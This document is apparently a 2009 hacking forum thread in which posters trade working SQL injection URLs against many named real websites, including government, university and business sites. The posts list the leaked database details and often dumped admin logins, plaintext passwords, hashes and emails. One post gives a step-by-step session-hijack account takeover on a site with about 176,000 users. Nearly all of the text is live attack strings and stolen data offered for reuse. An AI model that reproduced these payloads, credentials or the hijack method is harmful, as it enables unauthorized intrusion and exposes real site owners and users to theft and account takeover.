http://www.antarvictoria.org.au/local-group.php?id=9999+union+select+1,table_name,3,4,5, 6,7,8,9,10,11,12,13+from+information_schema.tables +limit+18,1--
version() 5.0.67
user() antarvic_l_user@localhost
database() antarvic_local
pr4
http://www.qcal.org.au/seminars/event.php?ID=9999+union+select+1,2,version(),4,5,6 ,7,8,9,10,11,12,13--
version() 4.1.22-standard-log
user() qca7919_public@localhost
database() qca7919_QCAL
pr4
http://www.volzsky.ru/categ.php?id=9999+union+select+1,concat_ws(char(32 ,32),version(),user(),database())--
version() 5.1.32-community-log
user() Wx1000_volzskij@194.176.118.38
database() Wx1000_volzskij
pr3
http://www.countrywide.net.au/view_distributor.php?id=999+union+select+1,CONCAT( username, CHAR(32,58,32), password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,3 5,36,37,38+from+auth/*&cadellt
/admin/index.php
cwdadmin : countrywide1
version() 4.0.27-standard
user() country_countryw@localhost
database() country_countrywide
pr5
http://www.velikieluki.ru/struc/struc2_d.php?struc2_id=9999+union+select+0,concat_ ws(char(32,32),version(),user(),database()),userna me,%20CHAR(32,58,32),%20user_password),2,3,4,5--&struc_id=2
version() 5.0.27-log
user() velikieluki@localhost
database() velikieluki
and finally, PostgreSQL
pr5
http://nursing.flinders.edu.au/research/index.php?id=108'+union+select+1,version(),null,nu ll,null,null,null,null,null,null,null,null,null,nu ll--
version() - PostgreSQL 8.1.11 on i686-redhat-linux-gnu, compiled by GCC gcc (GCC) 4.1.2 20070626 (Red Hat 4.1.2-14)
current_user() - nursstaff
current_database() - nursing
Cennarios
03.04.2009, 23:03
http://www.allcolombiangirls.com/detail.php?code=-1+union+select+1,2,concat_ws(0x3a3a,uname,confirmk ey),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+s ignup+limit+21,1--
For those in need. Women =)))
http://cleveland.dbusinessnews.com/shownews.php?newsid=124409+union+select+unhex(hex( concat_ws(0x3a,version(),database(),user()))),2,3, 4,5,6,7/*&type_news=latest
Database Version: 4.1.11
Database name: dbusinessnews_db
User name: dbnewsdbadmin@localhost
The vulnerability is present on all of these sites...
http://www.liguegolf-limousin.org/page/page.php?id=-1+union+select+1,2,concat_ws(0x3a,login_utilisateu r,pwd_utilisateur),4,5+from+utilisateur--
http://www.liguegolf-limousin.org/infos_club/login.php
<<Botany>>
http://www.noviyegrani.com/subjects.php?ID=-223'+union+select+1,column_name,3,4,5,6,7,8,9+from +information_schema.columns+where+table_name='_kul lanicilar'--+
db: 5.0.45
name_db: noviye
user: noviye@localhost
log: sinantr
pass: 46ab172f44d6dfed
log: kerem37
pass: 0e5360d8365b0c67
----------------------------------
----------------------------------
http://www.fontaene-verlag.de/book.php?ID=-20'+union+select+1,2,3,4,concat_ws(0x3a,version(), database(),user()),6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*
db: 5.0.45
name_db: kaynak_verlag2
user: kulturyabanci@localhost
--------------------------------
--------------------------------
http://www.multi-master.ru/service/detail.php?id=-10+union+select+1,2,version(),4,5,6,7,8--+
db: 4.0.25-standard
name_db: multi72_base
user: multi72_admin@web8.100mb.net
Cennarios
04.04.2009, 14:49
http://www.usjf.net/modules.php?op=modload&name=News&file=article&sid=-1+union+select+1,concat_ws(0x3a3a,pn_uname,pn_pass ,pn_user_icq),3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21+from+nuke_users+limit+0,1/*
Damn Americans...
<<Oryol City Administration>>
http://www.orel-adm.ru/index.php?id=-4-3'+union+select+1,unhex(hex(version())),3/*
db: 4.1.10a-log
name_db: tbase
user: utw@localhost
http://www.physikinstrumente.com/en/news/fullnews.php?newsid=-148+union+select+1,2,3,unhex(hex(concat_ws(0x3a,ve rsion(),database(),user()))),5,6,7
Version : 4.1.15-Debian_1ubuntu5-log
Database : pi_temp
User : pi_temp_admin@localhost
Cennarios
04.04.2009, 17:57
http://www.agencyscams.info/scammer_profile.php?id=-1+union+select+concat_ws(0x3a3a,login,password)+fr om+users+limit+0,1/*
Marriage agency =)))
<<"Custos" electronic library>>
http://custos.ru/view_all.php?id=-66'+union+select+1,2,concat_ws(0x3a,table_schema,c olumn_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20+from+information_schema.columns+where+table _name='userlist'+limit+1,1--+
db: 5.0.67 percona-b5-log
name_db: custos
user: custos@localhost
OS: redhat-linux-gnu
-=admin=-
table:wp_user
db:custos_aliber
log: admin
pass: $P$Bk/TSk3K10o50RA8rYCm64aCQouR/ hmm :( :( :(
mail: aliber12@yandex.ru
-=users=-
table_name: user_list
db: custos
log: custos
pass: pass!23wo2345$%rd
There turned out to be only one user... Apparently he is also the admin...
---------------------------------------------------
---------------------------------------------------
<<"APsara" erotic dance school>> :)
http://www.stripdance.com.ua/index.php?id=999+union+select+1,2,3,concat_ws(0x3a ,version(),database(),user())--
db: 5.1.30
name_db: stripdan_db
user: stripdan_admin@localhost
reading robots.txt
User-agent:
Disallow:/administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /editor/
Disallow: /help/
Disallow: /images/
Disallow: /includes/
Disallow: /language/
Disallow: /mambots/
Disallow: /media/
Disallow: /modules/
Disallow: /templates/
Disallow: /installation/
-------------
http://www.wdance.com.ua/administrator/
You are greeted by the message "Welcome to Joomla!" :)
-------------
-=admins=-
table:user_tab
type: admin
log: admin
pass: 777 :p
type: admin
log: jony
pas: f56d08c116d513a223508f31b53d8186 :(
-=users=-
+limit+x,x--+
:D :D :D
mailbrush
04.04.2009, 21:16
http://so-znanie.com/index.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version())soznanie_jest@localhost:soznanie_web14 db1:5.0.67-community-log
http://so-znanie.com/index.php?id=-1+union+select+1,2,concat_ws(0x3a,username,user_pa ssword)+from+phpbb_users+limit+1,1
admin:$H$9E9TzrtDlqUnPvFMYhqJaISbU/UKV21
http://so-znanie.com/forum/index.php
.:[melkiy]:.
04.04.2009, 21:58
http://www.adventureonline.co.za/read_more.php?id=-1874+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16--
Database Version: 5.0.67-community
Database name: adventur_adventure
User name: adventur_adventu@localhost
Extract from users
http://www.panda.org.za/article.php?id=-498+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--
Database Version: 4.1.22
Database name: panda
User name: panda@localhost
:D
_http://local.abonent.m-10.ru/forgot.html?txtLogin=asd&email=-1'+OR+substring(@@version,1,1)=4+--+
version():4
http://www.cy-pr.com/img_m-10.ru_6.gif
_http://billur.net/useradmin/pass.php
version():4
http://www.cy-pr.com/img_billur.net_6.gif
via the POST method
both fields are vulnerable
_http://xfes.ru/p/hosting/-1'+union+select+version()+--+
version():5.1.32-log
http://www.cy-pr.com/img_xfes.ru_6.gif
authentication is also vulnerable))
DrAssault
05.04.2009, 12:59
http://www.jaffnaroyalfamily.org/news.php?id=-41+union+select+1,2,date,version(),5,6,7,8+from+ne ws/*
mailbrush
05.04.2009, 13:36
http://www.tagderkueche.de/presse/adetails.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),datab ase(),version()),6
Job
All the sites on the server are job sites, version five, access to all databases =)
http://www.fairylakejobs.net/php/job.php?id=-343989/**/union/**/select/**/1,concat_ws(0x3A3a,user(),version(),database()),3/*
fljobssi@localhost
5.0.45
sql57865_1
.:[melkiy]:.
05.04.2009, 15:34
http://archives.stael.org/2/sections.php3?op=viewarticle&artid=9999+union+select+1,2,3,4,5--
Database Version: 5.0.45-Debian_1ubuntu3.3-log
Database name: staelorg
User name: staelorg@88.191.253.130
http://agria.hu/sections.php3?op=viewarticle&artid=9999+union+select+1,2,3,4,5--
Database Version: 4.1.11-Debian_4sarge8-log
Database name: nuke
User name: portal@localhost
http://www.atlantyd.com/sections.php3?op=viewarticle&artid=9999+union+select+1,2,3,4,5--
Database Version: 4.0.21-log
Database name: atlantyd_com
User name: atlantyd_com@localhost
http://www.povituha.ru/news.php?id=9999+union+select+1,2,concat_ws(0x3a,v ersion(),database(),user()),4,5,6--+
db: 5.0.32-Debian_7etch3-log
name_db: povituha
user: povit_gst@localhost
-----------------------------
-----------------------------
http://oculus.ru/blog.php?id=106&a=-9+union+select+unhex(hex(concat_ws(0x3a,version(), database(),user()))),2,3,4,5,6,7--+
db: 4.1.14-log
name_db: oculus
user: oculus@localhost
M.W.N.N.
05.04.2009, 19:13
http://hcch.e-vision.nl/index_en.php?act=status.accept&mid=262+union+select+1,2,unhex(hex(concat(version( ),0x3a,database(),0x3a,user()))),4,5,6,7,8/*
version():4.1.11-Debian_4sarge7-log
database():hcch
user():hcch@localhost
http://hcch.e-vision.nl/index_en.php?act=status.accept&mid=262+union+select+1,2,unhex(hex(concat(user,0x3 a,password))),4,5,6,7,8+from+mysql.user/*
.:[melkiy]:.
05.04.2009, 19:27
http://www.virginworlds.com/pg.php?n=470099+union+select+1,2,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22--
Database Version: 5.0.67-0ubuntu6
Database name: virginworlds
User name: vwuser@localhost
M.W.N.N.
05.04.2009, 19:48
http://scriptorium.serve-it.nl/view.php?sid=54+union+select+1,unhex(hex(concat(ve rsion(),0x3a,database(),0x3a,user()))),3,4,5,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19+limit+1,1/*
version():4.1.12-standard
database():serve_scriptorium
user():serve_serve@localhost
pr4
http://imperial.ca.gov/section.php?id=17+and+ascii(substring(y()),1,1))=x
y1=version
y2=user
x1=53,46,48,46,48,55
x2=114,105,98,97,114,100,111,104,100,122,64,108,11 1,99,97,108,104,111,115,116
version() - 5.0.07
user() - ribardohdz@localhost
worldstart.com
pr=5
http://worldstart.com/kb/answers.php?sku=3917+and+1=0+union+select+1,2,3,co ncat_ws(0x20,user(),database(),version(),@@basedir ,@@datadir,@@tmpdir,@@version_compile_os),5+--%20--
tipadmin@207.126.59.171 kb 5.0.45 /usr/ /var/lib/mysql/ /tmp/ redhat-linux-gnu
ILYAtirtir
05.04.2009, 23:45
geometria.ru
http://smr.geometria.ru/index.php?show=user&user=999+union+select+1,2,3,4,5,concat_ws(0x3a,dat abase(),user(),version()),7/*
geometria:geometria@client131-18.cmk.ru:5.0.45-log
Going into information_schema.
http://smr.geometria.ru/index.php?show=user&user=999+union+select+1,2,3,4,5,table_name,7+from+ information_schema.tables/*
An interesting table: "user"
http://smr.geometria.ru/index.php?show=user&user=999+union+select+1,2,3,4,5,column_name,7+from +information_schema.columns+where+table_name=0x757 36572/*
I liked the columns: login, password =)
http://smr.geometria.ru/index.php?show=user&user=999+union+select+1,2,3,4,5,concat_ws(0x3a,log in,password),7+from+user+limit+1,500/*
Dumping the first 500 from the database. In total there are currently 176055 working accounts.
The password is hashed with who knows what, maybe md5 with a salt, but I didn't find a column with it, and we don't need it anyway.))
So, we pick a user, for example "Fusion".
http://smr.geometria.ru/index.php?show=user&user=999+union+select+1,2,3,4,5,concat_ws(0x3a,log in,session_id),7+from+user+where+login=0x467573696 F6E/*
Fusion:mfjrhju2pua8lj4ob7k3n20e81
Right, good. Next, if you are registered, go to cookie editing. Change PHPSESSID, OK, F5, and now we are under someone else's login. Click on our login and we get to the page with the user's info, click on change details. The trick is that when changing the password it does not ask for the old password) so we enter the new password twice, then "change", and that's it.=)
http://www.uoit.ca/calendar/0405/info-display.php?ID=-83/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8/**//*
Database Version: 4..20-standard
Database name: uoitcalendar0405
User name: uoitcalendar0405@localhost
http://www.quantumbindery.ca/bindery-equipment/equipment-display.php?id=-10/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8/**//*
Database Version: 4.1.22-standard
Database name: quantum_products
User name: quantum_leap@localhost
http://ladyfitness.ru/php/photo.php3?id=999+union+select+1,concat_ws(0x3a,ve rsion(),database(),user(),@@version_compile_os),3, 4,5,6,7,8--+
db: 5.0.51
name_db: ladyfit
user: db_user@localhost
os: portbld-freebsd6.2
table: users
db: pun_bb
-=admin=-
log: admin
pass: 36058a75bd500c96eeaca789e9f1fe1d758e7f66 :(
-=users=-
+limit+x,x--+
laedafess
06.04.2009, 17:01
Greek shop (pr = 3)
http://www.roses2u.gr/detail.php?flowerid=-69+union+select+1,2,3,concat_ws(0x3a,user(),databa se(),version()),5+--
user() = roses2u_roses@localhost
database() = roses2u_roses
version() = 5.0.67-community
http://www.roses2u.gr/detail.php?flowerid=-69+union+select+1,2,3,concat_ws(0x3a,username,pass word),5+from+users+--
username = roses2u
password = rc4#7!
a parody of an admin panel: http://roses2u.gr/console/
<<Information and reference service>>
http://help-nova.ru/index.php?cat=1&subcat=-164+union+select+1,2,3,concat_ws(0x3a,version(),da tabase(),user(),@@version_compile_os),5--
db: 5.0.51a-community-log
name_db: helpnov_help
user: helpnov_help@localhost
os: redhat-linux-gnu
table: pmd_admin
-=admin=-
log: admin
pass: savva
table: pmd_users
http://help-nova.ru/index.php?cat=1&subcat=-164+union+select+1,2,3,concat_ws(0x3a,login,pass), 5+from+pmd_users--+
and all the users....
--------------------------------------
<<HeppyWoman>>
http://happywoman.com.ua/article&pid=571&parent=999'+union+select+concat_ws(0x3a,table_name ,table_schema)+from+information_schema.columns+whe re+column_name+like+0x70617373776f7264--+
db: 5.0.75
name_db: happywoman
user: dbhappywoman@localhost
os: portbld-freebsd7.0
-------------------------------
http://happywoman.com.ua/admin/ :(
-------------------------------
table: cns_users
db: cnstats
-=admins=-
log: admin
pass: 2E6975A9DE99EA679B328195AB5B3AB5BA22FD8C :(
-=users=-
log: fortest
pass: fortest
+limit+x,x--+
http://www.beattyhigh.net/scrapbook/photo.php?id=11/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10/**/LIMIT/**/1,1/*
Database Version: 4.1.25-Debian_mt1
Database name: brightideasutah_com_-_bhsgen
User name: brightideasuta@64.13.192.13
4 users in the users table
id:pass:user
1:starwars:icem
13:friday:admin
24:stinger:webed
25:hotdog:richicem
.:[melkiy]:.
06.04.2009, 21:58
http://www.rode.co.za/news/article.php?ID=-2239+union+select+1,2,3,4,5,6,7--
Database Version: 5.0.32-Debian_7etch8
Database name: engine
User name: rode_root@dedi6.cpt2.host-h.net
Login: admin
Pass: fightingf1sh
Pagerank: 6
http://www.asia-anf.org/NewsDetails.php?NewsId=-166+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4,5,6--
Database Version: 4.1.22-standard
Database name: asinanoo_anf
User name: asinanoo_admin@localhost
PR - 5
http://www.hockeyboss.ru/index.php?action=0&id=42+union+select+1,concat_ ws(0x3a,version(),database(),user()),3,4,5,6--
Database Version : 5.0.32-Debian_7etch6-log
Database name : superligaDB
User name : superliga@www.internal.hockeyboss.ru
admin :
http://www.hockeyboss.ru/index.php?action=0&id=42+union+select+1,2,concat_ws(0x3a,username,pas swd),4,5,6+from+users+where+username=ch ar(97,100,109,105,110)--
Admin:*10C76DCEABF030E275D0809D5F6C5438CD671BA1 - 957762
.:[melkiy]:.
06.04.2009, 23:45
http://www.jnht.com/heritage_site.php?id=-88+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17--
Database Version: 4.0.27-max-log
Database name: db189841794
User name: dbo189841794@74.208.16.89
http://www.usashooting.org/athlete.php?id=-88+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
Database Version: 5.0.67-log
Database name: shoot1
User name: usashoot@apache2-twiddle.iris.dreamhost.com
4 for the admin panel
competitions:2de809f72949339e849d2b73e39576fa : comps@2468
-
marketing:eb75757f1517f30eaecd258f2d746e02 : ???
-
claire:67d0f2f380bf297e35c354191caec8bd : ???
-
innovative:4a58d6a4040d95671dfcb74f1fbaf592 : ???
http://www.tennoil.com/newsletter.php?id=-252+union+select+1
Database Version: 4.1.12
Database name: tennoil
User name: tennoil@localhost
http://www.israelunitycoalition.org/news/newsletter.php?id=-121633+union+select+1,2,3,concat(user(),0x3a,versi on()),5,6,7,8,9,0,1/*
Israel :mad:
pr5
ucing@localhost:5.0.45
http://anthenv.web.arizona.edu/Newsletter.php?Id=53333+union+select+1,concat(User name,0x3a,Password),3,UserId,5,6+from+Users
EDU
Database Version: 5.0.22
Database name: anthenv
User name: anthenv@localhost
-
username:sdowney
pass:chaos95
http://anthenv.web.arizona.edu/login.php
doesn't work for some reason
http://www.neuroscience-tuebingen.de/research-groups/display.php?type=Department&id=-37/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
User name: neuroscience@localhost
Database Version: 5.0.18
Database name: dbneuroscience
attajdid.info
PageRank 7
http://www.attajdid.info/def.asp?codelangue=6&infoun=48015+UNION+SELECT+'0','1',concat_ws(0x3a,v ersion(),user()),'3','4','5','6','7','8','9','10', '11'%20,'12','13','14','15','16','17','18','19','2 0','21','22','23','24','25','26','27','28','29','3 0','31','32','33','34','35','36'--
5.0.67-community-nt:zaherland@localhost
Pagerank: 5
http://www.billybishop.org/newsfull.php?NewsID=-19+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ ws(0x3a,version(),database(),user(),@@version_comp ile_os),14,15,16,17,18,19
Database Version: 4.1.20
Database name: osmuseums
User name: mrailbishop@localhost
Os : redhat-linux-gnu
<<Business organization strategy systems "Boss" >>
http://www.bossmag.ru/view.php?id=-3343'+union+select+1,2,3,4,5,6,concat_ws(0x3a,vers ion(),database(),user(),@@version_compile_os),8,9, 10,11,12,13--+
db: 5.0.32-Debian_7etch4-log
name_db: z90196_bossmag
user: z90196_bossmag@77.221.130.20
os: pc-linux-gnu
The server is slow, I have no desire whatsoever to keep working on it.....
http://harttweb.hartford.edu/mediapage-events.php?mediaID=47+union+select+1,user(),3,4,5, 6+limit+1,1/*
User: root@localhost
Version: 5.0.27-community-nt
Db: hartt
http://www.yourhometeamatremax.ca/listing_profile.php?PropertyID=-306+union+select+1,2,3,4,5,6,concat_ws(0x3a,versio n(),database(),user(),@@version_compile_os),8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28,29--
Database Version: 4.1.20
Database name: yhtatremax
User name: remax06@localhost
Os : redhat-linux-gnu
http://www.on-the-right-track.com/newsletter.php?id=16933+UNION+SELECT+1,2,3,4,5
Database Version: 4.1.22-standard-log
Database name: admin_main
User name: admin@localhost
<<Data Robotics >>
http://www.drobo.com/droboapps/downloads/index.php?id=-16+union+select+1,concat_ws(0x3a,version(),databas e(),user(),@@version_compile_os),3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--+
db: 5.0.67-community
name_db: droboco_datarobotics1
user: droboco_dradmin@localhost
os: redhat-linux-gnu
---------------------------
http://www.drobo.com/admin/login.php
---------------------------
tables:
accounts
members
http://www.fairtourismsa.org.za/fttsa/display.php?id=50/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30/**/LIMIT/**/1,1/*
Database Version: 5.0.37-community-nt
Database name: fttsa
User name: fttsa_user@41.204.198.52
there is smf_members
Fields member_name:passwd:password_salt
admin:3e86317ab708619c0fd544f555c1e4bcc7d7af3a:f09 b
<<Russian Language Institute >>
http://www.ruslang.ru/agens.php?id=div&sp=-84+union+select+1,2,3,4,concat_ws(0x3a,version(),d atabase(),user(),@@version_compile_os),6,7,8,9,10, 11,12,13,14,15,16,17,18,19--+
db: 4.1.25-log:
name_db: db10011926
user: 10011926@localhost
os: unknown-freebsd4.10
TOONDRA animation studio
http://www.toondra.ru/news.php?newsID=-115+union+selecT+1,2,3,4,5--
ph1l1ster
07.04.2009, 19:28
In honor of the riots in Chisinau (https://forum.antichat.ru/threadnav114861-1-10.html) :D
http://www.kishinev.ru/php-bin/gorod_res.php?object_=0+union+Select+1,2,3,concat( user(),0x3a,version(),0x3a,database()),5,6,7,8,9,0 ,11--
Database Version: 5.0.67-community-nt
Database name: ghincul
User name: ghincul@65.182.101.165
http://www.kishinev.ru/php-bin/gorod_res.php?object_=0+union+Select+1,2,3,concat( user_name,0x3a,user_password),5,6,7,8,9,0,11+from+ cpg_users--
http://www.kishinev.ru/gallery/
astanc_:1915
<<Management in housing and utilities >>
http://www.g-k-h.ru/articles.php?id=-928'+union+select+concat_ws(0x3a,version(),databas e(),user(),@@version_compile_os),2,3,4,5,6,7,8/*
db: 4.1.21-log
name_db: lex_pravo
user: rshm_minimba@localhost
os: portbld-freebsd6.1
---------------------------------------------------------
<<International food exhibition >>
http://www.peterfood.imperiaforum.ru/page.php?id=999'+union+select+1,2,3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43, 44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60 ,61,62,63,64,65,66,67,version(),69,70--+
db: 5.0.24a
name_db: imperia2
user: imperia2@localhost
os: unknown-freebsd6.1
information_schema :( :( :( - locked.....